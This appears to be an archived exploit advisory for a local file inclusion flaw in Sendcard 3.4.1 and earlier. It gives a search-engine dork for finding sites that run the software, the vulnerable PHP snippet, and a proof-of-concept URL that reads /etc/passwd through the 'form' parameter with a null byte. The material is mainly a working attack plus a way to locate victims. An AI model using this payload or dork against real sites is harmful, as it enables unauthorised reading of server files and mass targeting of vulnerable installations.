id: 1811
date: 04/30/2007
title: Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability
author: ettee
cves: 

========================================================================
Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability
========================================================================



Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00



#  0day.today [2023-03-25]  #